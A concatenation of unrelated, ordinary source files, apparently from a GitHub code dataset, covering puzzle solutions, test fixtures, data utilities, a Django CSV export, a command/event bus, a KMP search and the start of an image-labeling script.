with open('2022/3/input.txt') as file:
    sacks = [sack.strip() for sack in file.readlines()]

# Priority table: a-z -> 1..26, A-Z -> 27..52 (index + 1).
priority = 'abcdefghijklmnopqrstuvwxyz'
priority += priority.upper()

priorities = []
# Elves come in groups of three; the badge is the single item type common
# to all three rucksacks in a group (set intersection replaces the old
# quadratic membership loop).
for first, second, third in zip(*[iter(sacks)] * 3):
    badge = (set(first) & set(second) & set(third)).pop()
    priorities.append(priority.index(badge) + 1)

print(sum(priorities))
| jimenezj8/advent_of_code | 2022/3/part2.py | part2.py | py | 460 | python | en | code | 0 | github-code | 36 |
16486666559 | # -*- coding: utf-8 -*-
from plone.app.contenttypes.testing import PLONE_APP_CONTENTTYPES_FIXTURE
from plone.app.robotframework.testing import REMOTE_LIBRARY_BUNDLE_FIXTURE
from plone.app.testing import applyProfile
from plone.app.testing import FunctionalTesting
from plone.app.testing import IntegrationTesting
from plone.app.testing import PloneSandboxLayer
from plone.testing import z2
import polklibrary.linkchecker
class PolklibraryLinkcheckerLayer(PloneSandboxLayer):
    """Test layer: loads plone.restapi and this add-on into the Plone sandbox."""
    defaultBases = (PLONE_APP_CONTENTTYPES_FIXTURE,)
    def setUpZope(self, app, configurationContext):
        # Load any other ZCML that is required for your tests.
        # The z3c.autoinclude feature is disabled in the Plone fixture base
        # layer.
        import plone.restapi
        self.loadZCML(package=plone.restapi)
        self.loadZCML(package=polklibrary.linkchecker)
    def setUpPloneSite(self, portal):
        # Install this add-on's default profile into the test site.
        applyProfile(portal, 'polklibrary.linkchecker:default')
POLKLIBRARY_LINKCHECKER_FIXTURE = PolklibraryLinkcheckerLayer()
POLKLIBRARY_LINKCHECKER_INTEGRATION_TESTING = IntegrationTesting(
bases=(POLKLIBRARY_LINKCHECKER_FIXTURE,),
name='PolklibraryLinkcheckerLayer:IntegrationTesting',
)
POLKLIBRARY_LINKCHECKER_FUNCTIONAL_TESTING = FunctionalTesting(
bases=(POLKLIBRARY_LINKCHECKER_FIXTURE,),
name='PolklibraryLinkcheckerLayer:FunctionalTesting',
)
POLKLIBRARY_LINKCHECKER_ACCEPTANCE_TESTING = FunctionalTesting(
bases=(
POLKLIBRARY_LINKCHECKER_FIXTURE,
REMOTE_LIBRARY_BUNDLE_FIXTURE,
z2.ZSERVER_FIXTURE,
),
name='PolklibraryLinkcheckerLayer:AcceptanceTesting',
)
| polklibrary/polklibrary.linkchecker | polklibrary.linkchecker/src/polklibrary/linkchecker/testing.py | testing.py | py | 1,639 | python | en | code | 0 | github-code | 36 |
def merge(s, e):
    """Merge-sort arr[s..e] in place, using the global `temp` as scratch.

    Also increments the global `cnt` once per merge step whose left half's
    last element exceeds the right half's last element.
    """
    global cnt
    if s == e:
        return
    mid = (s + e - 1) // 2
    merge(s, mid)
    merge(mid + 1, e)
    if arr[mid] > arr[e]:
        cnt += 1
    left, right, out = s, mid + 1, s
    # Standard two-way merge into temp[s..e].
    while left <= mid and right <= e:
        if arr[left] <= arr[right]:
            temp[out] = arr[left]
            left += 1
        else:
            temp[out] = arr[right]
            right += 1
        out += 1
    while left <= mid:
        temp[out] = arr[left]
        left, out = left + 1, out + 1
    while right <= e:
        temp[out] = arr[right]
        right, out = right + 1, out + 1
    # Copy the merged run back into arr.
    arr[s:e + 1] = temp[s:e + 1]
# Driver: first line is the test-case count; each case supplies N and N ints.
for tc in range(1, int(input())+1):
    N = int(input())
    arr = list(map(int, input().split()))
    temp = [0] * N
    cnt = 0
    merge(0,N-1)
    # Output: the median after sorting plus merge()'s swap counter.
    print(f'#{tc} {arr[N//2]} {cnt}')
30526696470 | from __future__ import print_function, division
import os
import logging
import math
import numpy as np
import pandas as pd
import torch
from torch.utils.tensorboard import SummaryWriter
IS_ON_SERVER = False if os.getcwd().startswith('/home/SENSETIME/yuanjing1') else True
axis_name2np_dim = {
"x": 2,
"y": 1,
"z": 0,
}
# --------
# data normalization
def mean_std_norm(array):
    """Zero-mean / unit-std normalisation (epsilon guards a zero std)."""
    centered = array - array.mean()
    return centered / (array.std() + 1e-10)
def rescale01(arr):
    """Min-max normalise arr onto [0, 1]."""
    lo, hi = arr.min(), arr.max()
    return (arr - lo) / (hi - lo)
def window_rescale(arr, a_min=None, a_max=None):
    """Clip arr into [a_min, a_max], then map that window linearly to [0, 1]."""
    width = a_max - a_min
    clipped = np.clip(arr, a_min=a_min, a_max=a_max)
    return (clipped - a_min) / width
def auto_window(arr):
    """Robust windowing: rescale between the 1st and 99th intensity percentiles."""
    lo, hi = np.percentile(arr, 1), np.percentile(arr, 99)
    return window_rescale(arr, a_min=lo, a_max=hi)
# --------
# pad & crop
def get_pad_border(origin_shape, target_shape):
    """Per-axis (before, after) padding that grows origin_shape to target_shape,
    splitting the extra as evenly as possible (extra pixel goes after)."""
    assert len(origin_shape) == len(target_shape), 'Dimension mismatch.'
    pairs = []
    for origin, target in zip(origin_shape, target_shape):
        total = target - origin
        pairs.append((total // 2, total - total // 2))
    return tuple(pairs)
def pad_zyx_constant(nda, target_shape, pad_value=0, strict=False):
    """Center-pad nda with a constant up to target_shape.

    strict=True requires every target dim to be >= the input dim; otherwise
    target dims smaller than the input are kept at the input size.
    """
    assert nda.ndim == len(target_shape), 'Dimension mismatch.'
    if strict:
        assert np.all(np.array(target_shape) >= np.array(nda.shape)), 'Target shape must be larger than input shape.'
    else:
        target_shape = np.maximum(nda.shape, target_shape)
    pad_width = get_pad_border(nda.shape, target_shape)
    return np.pad(nda, pad_width, mode='constant', constant_values=pad_value)
def center_crop_zyx(nda, target_shape):
    """Crop the centered target_shape region out of nda."""
    offsets = np.asarray(nda.shape) - np.asarray(target_shape)
    starts = offsets // 2
    region = tuple(slice(a, b) for a, b in zip(starts, starts + np.asarray(target_shape)))
    return nda[region]
def constant_pad_crop(nda, target_shape, pad_value=0, strict=False):
    """Pad then center-crop so the result has exactly target_shape."""
    assert nda.ndim == len(target_shape), 'Dimension mismatch.'
    padded = pad_zyx_constant(nda, target_shape, pad_value, strict)
    return center_crop_zyx(padded, target_shape)
# --------
# logger
def log_init(log_dir):
    """Configure the root logger (file + console handlers at INFO) and a
    TensorBoard writer under log_dir/tb.

    Returns:
        (logger, writer): the root logging.Logger and a SummaryWriter.
    """
    logger = logging.getLogger()
    logger.setLevel(level=logging.DEBUG)
    formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(lineno)d - %(module)s - %(message)s')
    # handle for txt file
    f_handler = logging.FileHandler(os.path.join(log_dir, 'log.txt'))
    f_handler.setLevel(logging.INFO)
    f_handler.setFormatter(formatter)
    # handle for screen
    c_handler = logging.StreamHandler()
    c_handler.setLevel(logging.INFO)
    c_handler.setFormatter(formatter)
    logger.addHandler(f_handler)
    logger.addHandler(c_handler)
    writer = SummaryWriter(log_dir=os.path.join(log_dir, 'tb'))
    return logger, writer
# --------
def get_bbox(np_lbl):
    """Per-axis [min, max] index bounds of the nonzero voxels in np_lbl."""
    nonzero_per_axis = np.nonzero(np_lbl)
    return np.array([[axis.min(), axis.max()] for axis in nonzero_per_axis])
def hist_match(source, template):
    """Histogram-match `source` to `template` via empirical CDF interpolation."""
    shape = source.shape
    src = source.ravel()
    tpl = template.ravel()
    # unique values, inverse index and counts for both images
    s_values, bin_idx, s_counts = np.unique(src, return_inverse=True, return_counts=True)
    t_values, t_counts = np.unique(tpl, return_counts=True)
    # empirical CDFs normalised to [0, 1]
    s_quantiles = np.cumsum(s_counts).astype(np.float64)
    s_quantiles /= s_quantiles[-1]
    t_quantiles = np.cumsum(t_counts).astype(np.float64)
    t_quantiles /= t_quantiles[-1]
    # template value at each source quantile, mapped back per-pixel
    matched_values = np.interp(s_quantiles, t_quantiles, t_values)
    return matched_values[bin_idx].reshape(shape)
def make_one_hot(labels, num_classes):
    r"""One-hot encode integer labels.

    :param labels: N x H x W or N x D x H x W torch.LongTensor
    :param num_classes: number of classes C for the output channel dim
    :return: N x C x H x W or N x C x D x H x W one-hot LongTensor
    """
    idx = torch.unsqueeze(labels, dim=1)
    target_shape = list(idx.size())
    target_shape[1] = num_classes
    encoded = torch.zeros(target_shape).long().to(idx.device)
    return encoded.scatter_(dim=1, index=idx, value=1)
def save_csv(cfg, file_list, file_name):
    """Write file_list as a one-column CSV named file_name under cfg.save_dir."""
    frame = pd.DataFrame(np.array(file_list), columns=['file names'])
    frame.to_csv(os.path.join(cfg.save_dir, file_name), index=False)
def train_val_test_split(data_list, train_control, val_control, data_stratify=None, random_seed=None):
    """Split data_list into (train, val, test) lists.

    train_control / val_control may each be a float (fraction of the data)
    or an int (absolute count); the test split gets the remainder. When
    data_stratify (per-item class labels) is given, each class is split
    with the same ratios so class proportions are preserved.
    """
    def _split_one_group(data_list, train_num, val_num, random_seed=None):
        # Shuffle once, then carve out train / val / test index runs.
        data_length = len(data_list)
        if random_seed is not None:
            np.random.seed(random_seed)
        ids_seq = np.random.permutation(data_length)
        return data_list[ids_seq[0:train_num]], \
               data_list[ids_seq[train_num:train_num + val_num]], \
               data_list[ids_seq[train_num + val_num:]]
    data_length = len(data_list)
    if type(data_list) != np.ndarray:
        data_list = np.array(data_list)
    # ceil for train / floor for val so counts stay consistent with ratios.
    train_num = int(math.ceil(train_control * data_length)) if isinstance(train_control, float) else train_control
    val_num = int(math.floor(val_control * data_length)) if isinstance(val_control, float) else val_control
    if data_stratify is None:
        train_list, val_list, test_list = _split_one_group(data_list, train_num, val_num, random_seed)
    else:
        if type(data_stratify) != np.ndarray:
            data_stratify = np.array(data_stratify)
        classes, classes_counts = np.unique(data_stratify, return_counts=True)
        train_ratio = train_control if isinstance(train_control, float) else train_num / data_length
        val_ratio = val_control if isinstance(val_control, float) else val_num / data_length
        # Per-class counts; the last class absorbs the rounding remainder so
        # totals match train_num / val_num exactly.
        train_nums = []
        val_nums = []
        for i in range(len(classes)):
            if i != len(classes) - 1:
                train_nums.append(int(math.ceil(train_ratio * classes_counts[i])))
                val_nums.append(int(math.floor(val_ratio * classes_counts[i])))
            else:
                train_nums.append(train_num - np.asarray(train_nums).sum())
                val_nums.append(val_num - np.asarray(val_nums).sum())
        train_list = np.array([])
        val_list = np.array([])
        test_list = np.array([])
        # Each class gets its own (offset) seed so groups shuffle independently.
        for i, (t, v) in enumerate(zip(train_nums, val_nums)):
            tmp_train_list, tmp_val_list, tmp_test_list = \
                _split_one_group(data_list[data_stratify == classes[i]], t, v,
                                 random_seed + i * 10 if random_seed is not None else random_seed)
            train_list = np.concatenate((train_list, tmp_train_list))
            val_list = np.concatenate((val_list, tmp_val_list))
            test_list = np.concatenate((test_list, tmp_test_list))
    return train_list.tolist(), val_list.tolist(), test_list.tolist()
| eugeneyuan/test_rep | src/utils/miscs.py | miscs.py | py | 6,820 | python | en | code | 0 | github-code | 36 |
19680151162 | import unittest
import tonal
import mingus.core.notes
from scales import SCALE_NAMES, TonalScale
import mingus.core.scales as scales
notes = mingus.core.notes
to = tonal.Tonal()
ts = TonalScale()
class TestTonal(unittest.TestCase):
    """Tests for the module-level Tonal helper `to`."""
    def test_scale_octave(self):
        # Raising note 0 by one octave adds 12 semitones.
        self.assertEqual(12, to.add_octave(0, 1))
    def test_to_int(self):
        self.assertEqual(0, to.note_to_int("C"))
        # Cb wraps around to 11 (enharmonic with B).
        self.assertEqual(11, notes.note_to_int("Cb"))
        with self.assertRaises(TypeError):
            to.note_to_int(0)
    def test_pick_scale(self):
        # pick_scale must always return one of the known scale names.
        self.assertIsNotNone(to.pick_scale())
        self.assertIn(to.pick_scale(), SCALE_NAMES)
    def test_pick_base_note(self):
        # Base note converts to a semitone index within an octave.
        self.assertIn(notes.note_to_int(to.pick_base_note()), range(0, 13))
class TestScales(unittest.TestCase):
    """Tests for the module-level TonalScale helper `ts`."""
    def test_select_scale(self):
        # Selecting by name returns the corresponding mingus scale class.
        self.assertIsInstance(
            ts.select_scale("HarmonicMajor", "C"),
            scales.HarmonicMajor
        )
| gabelev/machine_music | tonal_test.py | tonal_test.py | py | 964 | python | en | code | 28 | github-code | 36 |
8733726032 | import pygame
pygame.init()
__screen_info = pygame.display.Info()
__height = __screen_info.current_h
# Screen constants
SCREEN_SIZE = (__height / 7 * 6, __height - 64)
ICON_SIZE = (64, 64)
LEFT_BOUND = 0
RIGHT_BOUND = SCREEN_SIZE[0] - ICON_SIZE[0]
TOP_BOUND = 0
BOTTOM_BOUND = SCREEN_SIZE[1]
ALIEN_INVASION_BOUND = SCREEN_SIZE[1] / 6 * 5 - ICON_SIZE[1]
# Player constants
INITIAL_PLAYER_COORDINATES = (SCREEN_SIZE[0] / 2 - ICON_SIZE[0] / 2,
SCREEN_SIZE[1] / 6 * 5)
PLAYER_BODY_LEFT_PAD = 6
PLAYER_BODY_TOP_PAD = 17
PLAYER_WIDTH = 52
PLAYER_HEIGHT = 31
# Num pixels the player moves left or right with each key pressed
PLAYER_SPEED = SCREEN_SIZE[0] * 9 / 800
# PlayerBullet constants
PLAYER_BULLET_SPEED = SCREEN_SIZE[1] / 100 * 3
PLAYER_BULLET_BODY_LEFT_PAD = 30
PLAYER_BULLET_BODY_TOP_PAD = 0
PLAYER_BULLET_WIDTH = 4
PLAYER_BULLET_HEIGHT = 17
# Alien constants
INITIAL_ALIEN_COORDINATES = (ICON_SIZE[0], SCREEN_SIZE[1] / 10 + ICON_SIZE[1])
ALIEN_BODY_LEFT_PAD = 2
ALIEN_BODY_TOP_PAD = 7
ALIEN_WIDTH = 60
ALIEN_HEIGHT = 48
NUM_ALIENS_PER_ROW = 8
BASE_NUM_ALIEN_ROWS = 3
MAX_NUM_ALIEN_ROWS = 5
ALIEN_HORIZONTAL_GAP = (
SCREEN_SIZE[0] - 2 * INITIAL_ALIEN_COORDINATES[0] - ICON_SIZE[0]) / (NUM_ALIENS_PER_ROW - 1)
ALIEN_VERTICAL_GAP = SCREEN_SIZE[1] / 15
BASE_ALIEN_MOVES_PER_SECOND = 0.4
# Num pixels alien traverses each time it moves
ALIEN_SPEED = SCREEN_SIZE[0] / 80
# Alien bullet constants
BASE_ALIEN_BULLET_SPEED = SCREEN_SIZE[1] / 100
BASE_ALIEN_CHANCE_TO_FIRE = 1 / 1_000
ALIEN_BULLET_BODY_LEFT_PAD = 26
ALIEN_BULLET_BODY_TOP_PAD = 36
ALIEN_BULLET_WIDTH = 12
ALIEN_BULLET_HEIGHT = 28
# UFO constants
INITIAL_UFO_COORDINATES = (0, 0)
BASE_UFO_SPEED = SCREEN_SIZE[0] / 160
UFO_CHANCE_TO_APPEAR = 1 / 400
# Sprite body padding/size within the 64x64 icon.
UFO_LEFT_PAD = 0
UFO_TOP_PAD = 16
# FIX: UFO_WIDTH/UFO_HEIGHT were defined twice (80x24 then 64x32); the
# later assignments won at runtime, so only those values are kept.
UFO_WIDTH = 64
UFO_HEIGHT = 32
# Scales for the constants as the level progresses
ALIEN_LEVEL_BEATEN_MOVES_PER_SECOND_SCALE = 1.15
ALIEN_DROP_ROW_MOVES_PER_SECOND_SCALE = 1.25
ALIEN_CHANCE_TO_FIRE_SCALE = 1.065
UFO_SPEED_SCALE = 1.05
# Hud constants
FONT_SIZE = int(ICON_SIZE[0] / 1.7)
SCORE_TEXT_COORDINATES = (SCREEN_SIZE[0] / 5 - FONT_SIZE * 5 / 2,
SCREEN_SIZE[1] / 100)
SCORE_VALUE_COORDINATES = (
SCORE_TEXT_COORDINATES[0], FONT_SIZE + SCREEN_SIZE[1] / 50)
LEVEL_TEXT_COORDINATES = (SCREEN_SIZE[0] / 2 - FONT_SIZE * 5 / 2,
SCREEN_SIZE[1] / 100)
LEVEL_VALUE_COORDINATES = (
LEVEL_TEXT_COORDINATES[0], FONT_SIZE + SCREEN_SIZE[1] / 50)
NUM_LIVES_TEXT_COORDINATES = (SCREEN_SIZE[0] / 5 * 4 - FONT_SIZE * 5 / 2,
SCREEN_SIZE[1] / 100)
NUM_LIVES_VALUE_COORDINATES = (
NUM_LIVES_TEXT_COORDINATES[0], FONT_SIZE + SCREEN_SIZE[1] / 50)
NUM_POINTS_FOR_ALIEN_KILL = 10
# Game over screen constants
GAME_OVER_TEXT_COORDINATES = (SCREEN_SIZE[0] / 2 - FONT_SIZE * (9 / 2),
SCREEN_SIZE[1] / 2 - FONT_SIZE / 2 - FONT_SIZE * 3)
GAME_OVER_SCORE_TEXT_Y_COORDINATE = GAME_OVER_TEXT_COORDINATES[1] + FONT_SIZE * 2
HIGH_SCORE_TEXT_Y_COORDINATE = GAME_OVER_SCORE_TEXT_Y_COORDINATE + FONT_SIZE * 2
RESTART_TEXT_COORDINATES = (SCREEN_SIZE[0] / 2 - FONT_SIZE * (12 / 2),
HIGH_SCORE_TEXT_Y_COORDINATE + FONT_SIZE * 2)
# Other
NUM_LEVELS_TILL_NEW_ALIEN_ROW = 3
BASE_POINTS_PER_KILL = 10
BASE_POINTS_PER_UFO_KILL = 100
FPS = 30 # Used to maintain smooth movement
| SimonValentino/SpaceInvaders | constants.py | constants.py | py | 3,409 | python | en | code | 0 | github-code | 36 |
70536840424 | '''
You are given a string allowed consisting of distinct characters and an array of strings words. A string is consistent if all characters in the string appear in the string allowed.
Return the number of consistent strings in the array words.
'''
class Solution(object):
    def countConsistentStrings(self, allowed, words):
        """
        :type allowed: str
        :type words: List[str]
        :rtype: int

        A word is consistent when every one of its characters appears in
        `allowed`.  Membership is checked against a set for O(1) lookups.
        """
        permitted = set(allowed)
        # Generator expressions avoid materializing a throwaway list per word
        # (the original built one inside all()); summing booleans counts hits.
        return sum(all(ch in permitted for ch in word) for word in words)
21213459172 | import csv
from django.db.models import Q
from django.http import HttpResponse
from data.models import (
List,
Pairing,
AOS,
BCP,
)
def raw_list(request, list_id):
    """Render a List's raw text as an HTML response, newline -> <br>.

    NOTE(review): the stored text is inserted unescaped; if raw_list can
    contain user-supplied markup this is an HTML-injection risk — confirm.
    """
    requested = List.objects.get(id=list_id)
    html_body = requested.raw_list.replace("\n", "<br>")
    return HttpResponse(html_body)
def export_pairings_as_csv(request, game_type: int = AOS):
    """Export all H2-2023 BCP pairings for *game_type* as a CSV download.

    Only events from 2023-07-01 to 2023-12-31 with 3, 5 or 8 rounds and
    sourced from BCP are included, ordered by event name, newest start
    date, round, then pairing id.
    """
    pairings = Pairing.objects.filter(
        Q(event__start_date__range=["2023-07-01", "2023-12-31"])
        & Q(event__rounds__in=[3, 5, 8])
        & Q(event__game_type=game_type)
        & Q(event__source=BCP)
    ).order_by("event__name", "-event__start_date", "round", "id")
    # The csv writer streams rows straight into the HTTP response body.
    response = HttpResponse(content_type="text/csv")
    response["Content-Disposition"] = 'attachment; filename="pairings.csv"'
    writer = csv.writer(
        response,
        quoting=csv.QUOTE_NONNUMERIC,
    )
    # Header row — keep in sync with the per-pairing row written below.
    writer.writerow(
        [
            "pairing_id",
            "round",
            "player1_name",
            "player2_name",
            "player1_result",
            "player2_result",
            "player1_score",
            "player2_score",
            "event_name",
            "event_date",
            "event_end_date",
            "event_country",
            "event_online",
            "season",
            "player1_faction",
            "player1_subfaction",
            "player2_faction",
            "player2_subfaction",
            "player1_list_url",
            "player2_list_url",
            "source",
        ]
    )
    for pairing in pairings:
        # BCP stores first/last name separately; other sources use one field.
        # NOTE(review): the queryset is already filtered to event__source=BCP,
        # so the else branch (and the trailing "snl" source value) appears
        # unreachable — confirm whether the filter or this branch is intended.
        if pairing.event.source == BCP:
            player1_name = (
                f"{pairing.player1.player.source_json['firstName']} {pairing.player1.player.source_json['lastName']}"
                if pairing.player1
                else ""
            )
            player2_name = (
                f"{pairing.player2.player.source_json['firstName']} {pairing.player2.player.source_json['lastName']}"
                if pairing.player2
                else ""
            )
        else:
            player1_name = (
                pairing.player1.player.source_json["playerName"]
                if pairing.player1
                else ""
            )
            player2_name = (
                pairing.player2.player.source_json["playerName"]
                if pairing.player2
                else ""
            )
        # Event metadata may be missing depending on the source payload.
        event_country = (
            pairing.event.source_json["country"] if pairing.event.source_json else ""
        )
        if "isOnlineEvent" in pairing.event.source_json:
            event_online = pairing.event.source_json["isOnlineEvent"]
        else:
            event_online = False
        player1_list_faction = (
            pairing.player1_list.faction if pairing.player1_list else ""
        )
        player1_list_subfaction = (
            pairing.player1_list.subfaction if pairing.player1_list else ""
        )
        player2_list_faction = (
            pairing.player2_list.faction if pairing.player2_list else ""
        )
        player2_list_subfaction = (
            pairing.player2_list.subfaction if pairing.player2_list else ""
        )
        # Cap oversized army lists so a single cell cannot blow up the CSV.
        if pairing.player1_list and len(pairing.player1_list.raw_list) > 10000:
            pairing.player1_list.raw_list = "List too long"
        if pairing.player2_list and len(pairing.player2_list.raw_list) > 10000:
            pairing.player2_list.raw_list = "List too long"
        writer.writerow(
            [
                pairing.id,
                pairing.round,
                player1_name,
                player2_name,
                pairing.player1_result,
                pairing.player2_result,
                pairing.player1_score,
                pairing.player2_score,
                pairing.event.name,
                pairing.event.start_date,
                pairing.event.end_date,
                event_country,
                event_online,
                "2023",
                player1_list_faction,
                player1_list_subfaction,
                player2_list_faction,
                player2_list_subfaction,
                pairing.player1_list.raw_list if pairing.player1_list else "",
                pairing.player2_list.raw_list if pairing.player2_list else "",
                "bcp" if pairing.event.source == BCP else "snl",
            ]
        )
    return response
| Puciek/aos_tools | data/views.py | views.py | py | 4,349 | python | en | code | 0 | github-code | 36 |
6084393611 | # Check Permutation: Given two strings, write a method
# to decide if one is a permutation of the other
# we can sort both strings then compare if they are equal
# merge sort
def merge_sort(arr):
    """Sort *arr* in place (ascending) using top-down merge sort.

    On ties the element from the right half is taken first, matching the
    strict `<` comparison of the merge step.
    """
    if len(arr) <= 1:
        return
    middle = len(arr) // 2
    left_half = arr[:middle]
    right_half = arr[middle:]
    merge_sort(left_half)
    merge_sort(right_half)
    # Merge the two sorted halves back into arr.
    read_left = read_right = write = 0
    while read_left < len(left_half) and read_right < len(right_half):
        if left_half[read_left] < right_half[read_right]:
            arr[write] = left_half[read_left]
            read_left += 1
        else:
            arr[write] = right_half[read_right]
            read_right += 1
        write += 1
    # Copy whichever half still has elements remaining.
    while read_left < len(left_half):
        arr[write] = left_half[read_left]
        read_left += 1
        write += 1
    while read_right < len(right_half):
        arr[write] = right_half[read_right]
        read_right += 1
        write += 1
def string_permutation(str1, str2):
    """True when str2 is a permutation of str1 (sort both, compare).

    Different lengths naturally fail: the joined sorted strings differ.
    """
    first_chars = list(str1)
    second_chars = list(str2)
    merge_sort(first_chars)
    merge_sort(second_chars)
    return "".join(first_chars) == "".join(second_chars)
# -------------------- better approach ------------------
# -------------------- hash table -------------------
def string_permutation_optimized(str1, str2):
    """True when str2 is a permutation of str1, in O(n) time.

    Counts the characters of str1 in a dict, then consumes those counts
    with str2: a missing or over-used character means not a permutation.
    """
    # Permutations must have equal length.
    if len(str1) != len(str2):
        return False
    # hash map: character -> remaining occurrences
    hash_map = {}
    for c in str1:
        hash_map[c] = hash_map.get(c, 0) + 1
    for c in str2:
        if c not in hash_map:
            # BUG FIX: characters absent from str1 were silently skipped
            # before, so e.g. ('ab', 'ac') was wrongly reported True.
            return False
        hash_map[c] -= 1
        if hash_map[c] < 0:
            return False
    return True


print(string_permutation_optimized('aaca', 'aacc'))  # expected: False
| phuclinh9802/data_structures_algorithms | chapter 1/1_2.py | 1_2.py | py | 1,834 | python | en | code | 0 | github-code | 36 |
70874370025 | import logging
from datetime import datetime
from typing import Generic, Text, Type, TypeVar
from uuid import UUID, uuid4
from injector import (
Injector,
UnknownProvider,
UnsatisfiedRequirement,
inject,
singleton,
)
from pydantic import BaseModel, Field
log = logging.getLogger(__name__)
class Command(BaseModel):
    """Immutable message describing an action to be performed.

    ``id`` and ``timestamp`` are generated per instance via
    ``default_factory`` (a plain default would be evaluated once at class
    definition and shared by every command).
    """
    id: UUID = Field(default_factory=uuid4)
    timestamp: datetime = Field(default_factory=datetime.utcnow)
    class Config:
        # Pydantic v1 switch: instances are read-only after construction.
        allow_mutation = False
    def __str__(self) -> Text:
        # Prefix pydantic's field dump with the concrete command class name.
        std_str = super().__str__()
        return f"<Command:{self.__class__.__name__} {std_str}>"
class Event(BaseModel):
    """Immutable record of something that happened while handling a command.

    ``command_id`` links the event back to the Command that caused it.
    """
    command_id: UUID
    id: UUID = Field(default_factory=uuid4)
    timestamp: datetime = Field(default_factory=datetime.utcnow)
    class Config:
        # Same immutability contract as Command.
        allow_mutation = False
    def __str__(self) -> Text:
        std_str = super().__str__()
        return f"<Event:{self.__class__.__name__} {std_str}>"
# Type variable binding a Handler to the concrete Command type it handles.
TCommand = TypeVar("TCommand")
class Handler(Generic[TCommand]):
    """Interface: one handler executes one concrete command type."""
    def __call__(self, command: TCommand) -> None:
        raise NotImplementedError
@inject
@singleton
class CommandBus:
    """Routes each Command to the Handler registered for its exact type."""
    def __init__(self, container: Injector) -> None:
        # Keep only the resolver; handlers are looked up lazily per command.
        self._get = container.get
    def handle(self, command: Command) -> None:
        log.debug(command)
        command_cls: Type[Command] = type(command)
        # Resolve Handler[ConcreteCommand] from the DI container; raises if
        # no handler was registered for this command type.
        handler = self._get(Handler[command_cls])
        handler(command)
# Type variable binding a Listener to the concrete Event type it observes.
TEvent = TypeVar("TEvent")
class Listener(Generic[TEvent]):
    """Interface: a listener reacts to one concrete event type."""
    def __call__(self, event: TEvent) -> None:
        raise NotImplementedError
@inject
@singleton
class EventBus:
    """Fans an Event out to every Listener registered for its exact type."""
    def __init__(self, container: Injector) -> None:
        self._get = container.get
    def emit(self, event: TEvent) -> None:
        log.debug(event)
        event_cls: Type[TEvent] = type(event)
        try:
            # injector multibinding: all Listener[ConcreteEvent] providers.
            listeners = self._get(list[Listener[event_cls]])
        except (UnsatisfiedRequirement, UnknownProvider):
            # No listeners registered for this event type — emitting is a no-op.
            listeners = []
        for listener in listeners:
            listener(event)
__all__ = ["Command", "CommandBus", "Event", "EventBus", "Handler", "Listener"]
| lzukowski/workflow | src/application/bus.py | bus.py | py | 2,137 | python | en | code | 5 | github-code | 36 |
def kmp(pattern, text):
    """Count occurrences of *pattern* in *text* with Knuth-Morris-Pratt.

    Prints the failure table and the start index of every match; returns a
    human-readable summary string.
    """
    failure = lpsarr(pattern, [0] * len(pattern))
    print(failure)
    matches = 0
    ti = pi = 0  # cursors into text and pattern
    while ti < len(text):
        if text[ti] == pattern[pi]:
            ti += 1
            pi += 1
        elif pi:
            # Mismatch mid-pattern: fall back via the failure table,
            # keeping ti in place.
            pi = failure[pi - 1]
        else:
            ti += 1
        if pi == len(pattern):
            matches += 1
            print(f"Starting Index {ti - pi}")
            # Continue searching for overlapping occurrences.
            pi = failure[pi - 1]
    return f"Total Matches Found {matches}" if matches != 0 else "No Match Found"
def lpsarr(pattern, lps):
    """Fill and return the KMP failure ("longest proper prefix-suffix") table.

    lps[k] is the length of the longest proper prefix of pattern[:k+1] that
    is also a suffix of it.  The caller's *lps* list is overwritten in place
    and also returned.
    """
    i = 0  # length of the currently matched prefix
    j = 1  # position whose lps value is being computed
    lps[0] = 0
    while j < len(pattern):
        if pattern[i] == pattern[j]:
            lps[j] = i + 1
            j += 1
            i += 1
        else:
            if i != 0:
                # Fall back to the next shorter candidate prefix.
                i = lps[i-1]
            else:
                # BUG FIX: was `lps[i] = 0`, which only produced correct
                # tables when the caller passed a zero-initialized list;
                # position j itself must be cleared.
                lps[j] = 0
                j += 1
    return lps
A = "onionionspl"  # text to search
B = "onions"       # pattern; expected to occur once, at index 3
print(kmp(B,A)) | Bishtman12/DSA---Python | String/KMP ALGO.py | KMP ALGO.py | py | 950 | python | en | code | 0 | github-code | 36 |
39395995067 | from aiogram.types import (
ReplyKeyboardMarkup,
InlineKeyboardMarkup,
InlineKeyboardButton,
)
# Label shown on each main-menu reply button, keyed by action name.
main_buttons = {
    "ask": "Спросить 🤖",
}


class Keyboard:
    """Builds and caches the bot's reply and inline keyboards."""

    def __init__(self):
        self.main = self.make_main_buttons()

    def make_main_buttons(self):
        """Reply keyboard with one row per entry of ``main_buttons``."""
        _keyboard_main = ReplyKeyboardMarkup(resize_keyboard=True)
        for button_label in main_buttons.values():
            _keyboard_main.add(button_label)
        return _keyboard_main

    @property
    def translate(self):
        """Inline Yes/No keyboard; the callback payload encodes the answer."""
        inline_keyboard = InlineKeyboardMarkup(row_width=2)
        # Plain string literals: the previous f-strings had no placeholders
        # (lint F541); the values are unchanged.
        true_button = InlineKeyboardButton(text="Да", callback_data="translate_1")
        false_button = InlineKeyboardButton(text="Нет", callback_data="translate_0")
        inline_keyboard.row(true_button, false_button)
        return inline_keyboard


kb = Keyboard()
| Devil666face/ChatGPTosBot | bot/keyboard.py | keyboard.py | py | 856 | python | en | code | 0 | github-code | 36 |
23012638929 | """
Script for labeling purposes
Usage :
python label_processing.py -d [PATH TO IMAGES FOLDER] [PARAMS]
Parameters:
-d : Path to the folder where the images is stored
-l : Lower all labels in xml files.
-c : Count each label of all the xml files
-s : Find images with specific label
-lm : Create label_map.pbtxt
    -ar : Remove xml files without images
RangRang - Machine Learning - 2021
"""
import os, argparse, glob
import xml.etree.ElementTree as ET
def auto_remove(path):
    """Delete annotation (.xml) files in *path* that have no matching image.

    A basename that appears only once has no companion file.  Checking that
    the .xml actually exists before removing fixes a crash: a lone image
    (e.g. ``c.jpg``) used to trigger ``os.remove`` on a non-existent
    ``c.xml`` and raise FileNotFoundError.
    """
    stems = [os.path.splitext(name)[0] for name in os.listdir(path)]
    for stem in set(stems):
        if stems.count(stem) < 2:
            orphan_xml = os.path.join(path, stem + '.xml')
            if os.path.isfile(orphan_xml):
                os.remove(orphan_xml)
def make_labelmap(path, export_dir):
    """Write a TF Object-Detection label_map.pbtxt for all labels in *path*.

    Labels are collected from every Pascal-VOC style xml (first child of
    each <object> element) and numbered from 1 in first-seen order.
    """
    labels = []
    for xml_file in glob.glob(path + '/*.xml'):
